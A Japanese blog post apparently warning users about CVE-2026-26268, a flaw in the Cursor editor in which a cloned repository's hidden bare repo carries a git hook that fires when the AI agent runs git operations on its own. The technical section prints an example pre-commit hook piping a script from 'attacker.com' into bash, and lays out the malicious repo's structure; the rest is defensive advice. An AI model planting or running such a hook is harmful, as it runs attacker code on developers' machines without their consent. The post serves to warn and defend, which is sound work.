【緊急】Cursorに「git clone」するだけでPCが乗っ取られる脆弱性！CVSS 9.9のヤバすぎる攻撃手法

結論から言うと、Cursorユーザーは今すぐバージョン2.5以上にアップデートしてください。

2026年4月28日、AIコーディングツール「Cursor」にCVSS 9.9（ほぼ満点） の致命的な脆弱性が公開されました。

あなたが悪意のあるリポジトリをgit cloneするだけで、何も操作しなくてもPCが完全に乗っ取られます。

何が起きているのか

CVE-2026-26268と呼ばれるこの脆弱性は、AIエージェントが自律的にGit操作を実行するというCursorの「便利な機能」を悪用したものです。

被害の流れ

1. 攻撃者が「普通に見える」GitHubリポジトリを作成
2. あなたがそのリポジトリをclone
3. CursorのAIエージェントが自動でGit操作を実行
4. 隠されたGit Hookが発動
5. あなたのPCで攻撃者のコードが実行される

従来のIDEなら、ユーザーが明示的にコマンドを実行しない限り何も起きません。

しかしCursorはAIが自律的に動く。

この「便利さ」が完全に裏目に出ました。

技術的な攻撃手法

この攻撃は、Gitの2つの正規機能を組み合わせています。

1. Git Hooks

Git Hooksは、特定のGitイベント（commit、checkout など）に反応して自動実行されるスクリプトです。

# .git/hooks/pre-commit の例
#!/bin/bash
curl -s http://attacker.com/steal.sh | bash

2. Bare Repository（ベアリポジトリ）

ワーキングディレクトリを持たない、Gitのバージョン管理データだけを含むリポジトリ。これを別のリポジトリの中に埋め込むことができます。

攻撃の実装

malicious-repo/
├── README.md（普通に見える）
├── src/（普通のコード）
└── .hidden-bare-repo/  ← ここにベアリポジトリ
    └── hooks/
        └── pre-commit  ← 悪意のあるスクリプト

CursorのAIエージェントがリポジトリを分析する際にgit checkoutなどの操作を実行すると、このpre-commitフックが自動的に発火します。

なぜCVSS 9.9なのか

この脆弱性が最高レベルに危険な理由：

要素	評価
攻撃の複雑さ	低（リポジトリをcloneさせるだけ）
必要な権限	なし（認証不要）
ユーザー操作	不要（AIが勝手にやる）
影響範囲	完全（任意コード実行）

「git cloneしただけ」で終わりです。

ユーザーは何も悪いことをしていない。ただリポジトリをcloneしただけ。それだけでPCが乗っ取られる。

影響を受けるバージョン

• Cursor 2.4以前の全バージョン

2026年2月に修正が完了し、4月28日に詳細が公開されました。

今すぐやるべきこと

1. Cursorをアップデート

# バージョン確認
cursor --version

# 2.5未満なら即アップデート

Cursor 2.5で、サンドボックス環境から.git設定ファイルへの書き込みを防ぐ適切な認可制御が実装されました。

2. 信頼できないリポジトリをcloneしない

GitHubで「便利そうなツール」を見つけても、スター数が少ない・作者が不明なリポジトリは要注意。

3. .git/hooks を確認

すでにcloneしたリポジトリの.git/hooksディレクトリを確認してください。

ls -la .git/hooks/
cat .git/hooks/pre-commit  # 中身を確認

4. AIエージェントの自動実行を制限

Cursorの設定で、AIエージェントが自動的にGit操作を実行する機能を無効化することを検討してください。

これはAIエージェント時代の「新しい脆弱性カテゴリ」

従来のセキュリティモデルは「ユーザーが明示的に操作する」ことを前提としていました。

しかしAIエージェントは：

• 自律的に判断して行動する
• ユーザーの承認なしにコマンドを実行する
• 攻撃者が仕込んだトリガーを踏む可能性がある

この脆弱性は、AIエージェントが「便利」であればあるほど危険になるという、新しい時代のセキュリティパラダイムを示しています。

Claude Codeユーザーも他人事じゃない

Cursor特有の脆弱性ですが、同じ設計思想を持つAIコーディングツールすべてに警鐘を鳴らしています。

AIエージェントが自律的に動く以上、「ユーザーが意図しない操作」が発生するリスクは常にあります。

AIコーディングツールを使う際の心得

• 信頼できないリポジトリは絶対にcloneしない
• AIの自動実行機能は慎重に使う
• 定期的にセキュリティアップデートを確認
• .gitディレクトリの中身を定期的に監査

まとめ

• CVE-2026-26268：Cursorに「git cloneするだけ」で任意コード実行される脆弱性
• CVSS 9.9：ほぼ最高レベルの深刻度
• 原因：AIエージェントが自律的にGit操作を実行する仕組み
• 対策：Cursor 2.5以上にアップデート

AIエージェントの「便利さ」は、同時に「攻撃面の拡大」でもあります。

便利なツールほど、セキュリティには気をつけましょう。

---

この記事が参考になったら、いいねと保存をお願いします！

質問：あなたはAIコーディングツールのセキュリティ、どこまで気にしていますか？コメントで教えてください。

参考リンク

CVE-2026-26268: How an AI Coding Agent Can Run Exploits in Cursor IDE

Cursor AI Coding Agent Vulnerability Allow Attackers to Execute Code on Developer's Machine

Critical Cursor bug could turn routine Git into RCE | CSO Online

CVE-2026-26268 Detail - NVD